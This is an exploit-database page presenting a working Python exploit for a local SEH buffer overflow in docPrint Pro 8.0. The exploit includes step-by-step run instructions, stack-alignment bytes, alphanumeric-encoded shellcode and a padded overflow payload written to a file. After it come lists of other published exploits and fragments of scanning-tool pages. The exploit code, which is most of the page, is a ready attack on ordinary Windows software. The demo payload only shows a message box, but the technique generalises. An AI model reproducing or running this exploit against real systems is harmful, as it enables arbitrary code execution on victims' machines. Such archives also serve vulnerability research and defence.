Menu

Search for hundreds of thousands of exploits

"docPrint Pro 8.0 - SEH Buffer Overflow"

Author

Exploit author

"Connor McGarr"

Platform

Exploit platform

windows

Release date

Exploit published date

2019-09-16

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
import struct
# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: September 14th, 2019
# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io)
# Vendor Homepage: http://www.verypdf.com
# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10 and Windows 7


# TO RUN:
# 1. Create a blank file named "test.pdf"
# 2. Open doc2pdf_win.exe
# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File"
# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay"
# 5. Click "Add File(s)"
# 6. Select the "test.pdf" file created from step 1.
# 7. Press on "Start" and name the file "exploit.pdf"

# Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII)

# Zero out registers for calculations.
zero = "\x25\x01\x01\x01\x01"
zero += "\x25\x10\x10\x10\x10"

# Stack alignment
alignment = "\x54"				# push esp
alignment += "\x58"				# pop eax
alignment += "\x2d\x1a\x50\x55\x55"		# sub eax, 0x1a505555
alignment += "\x2d\x1a\x4e\x55\x55"		# sub eax, 0x1a4e5555
alignment += "\x2d\x1a\x4e\x55\x55"		# sub eax, 0x1a4e5555
alignment += "\x50"				# push eax
alignment += "\x5c" 				# pop esp

# Custom created and encoded MessageBox POC shellcode.
# Utilized aplication DLL with no ASLR for Windows API call to MessageBox function.
# \x31\xc0\x50\x68
# \x42\x41\x4a\x41
# \x89\xe1\x50\x68
# \x42\x41\x4a\x41
# \x89\xe2\x50\x50
# \x51\x52\x50\xbe
# \x38\x20\x00\x10
# \xff\xe6\x41\x41

# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!)
shellcode = zero				# zero out eax
shellcode += "\x2d\x55\x15\x4f\x53"		# sub eax, 0x534f1555
shellcode += "\x2d\x55\x02\x4f\x53"		# sub eax, 0x534f0255
shellcode += "\x2d\x57\x01\x50\x53"		# sub eax, 0x53500157
shellcode += "\x50"				# push eax

# 4F554A42 4F554A42 51554B44
shellcode += zero				# zero out eax
shellcode += "\x2d\x42\x4a\x55\x4f"		# sub eax, 0x4f554a42
shellcode += "\x2d\x42\x4a\x55\x4f"		# sub eax, 0x4f554a42
shellcode += "\x2d\x44\x4b\x55\x51"		# sub eax, 0x51554b44
shellcode += "\x50"				# push eax

# 153A393A 153A393A 173B3B3B
shellcode += zero
shellcode += "\x2d\x3a\x39\x3a\x15"		# sub eax, 0x173b3b3b
shellcode += "\x2d\x3a\x39\x3a\x15"		# sub eax, 0x153a393a
shellcode += "\x2d\x3b\x3b\x3b\x17"		# sub eax, 0x173b3b3b
shellcode += "\x50"				# push eax

# 3A3A1927 3A3A0227 3B3B0229
shellcode += zero				# zero out eax
shellcode += "\x2d\x27\x19\x3a\x3a"		# sub eax, 0x3a3a1927
shellcode += "\x2d\x27\x02\x3a\x3a"		# sub eax, 0x3a3a0227
shellcode += "\x2d\x29\x02\x3b\x3b"		# sub eax, 0x3b3b0229
shellcode += "\x50"				# push eax

# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero				# zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f"		# sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f"		# sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40"		# sub eax, 0x403d4040
shellcode += "\x50"				# push eax

# 323A1A27 323A0227 333B0229
shellcode += zero				# zero out eax
shellcode += "\x2d\x27\x1a\x3a\x32"		# sub eax, 0x323a1a27
shellcode += "\x2d\x27\x02\x3a\x32"		# sub eax, 0x323a0227
shellcode += "\x2d\x29\x02\x3b\x33"		# sub eax, 0x333b0229
shellcode += "\x50"				# push eax

# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero                               # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f"             # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f"             # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40"             # sub eax, 0x403d4040
shellcode += "\x50"                             # push eax

# 323A1545 323A1545 333B1545
shellcode += zero				# zero out eax
shellcode += "\x2d\x45\x15\x3a\x32"		# sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3A\x32"		# sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3b\x33"		# sub eax, 0x333b1545
shellcode += "\x50" 				# push eax

# Let's roll.
payload = "\x41" * 1676
payload += "\x70\x06\x71\x06"			# JO 6 bytes. If fails, JNO 6 bytes
payload += struct.pack('<L', 0x10011874)	# pop ebp pop ebx ret reg.dll
payload += "\x41" * 2				# Padding to reach alignment
payload += alignment
payload += shellcode
payload += "\x45" * (6000-len(payload))

# Write to file
f = open('bajablast.txt', 'w')
f.write(payload)
f.close()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2019-09-16 "docPrint Pro 8.0 - SEH Buffer Overflow" local windows "Connor McGarr"
2019-05-16 "JetAudio jetCast Server 2.0 - 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow" local windows "Connor McGarr"
2019-05-07 "Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow" local windows "Connor McGarr" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected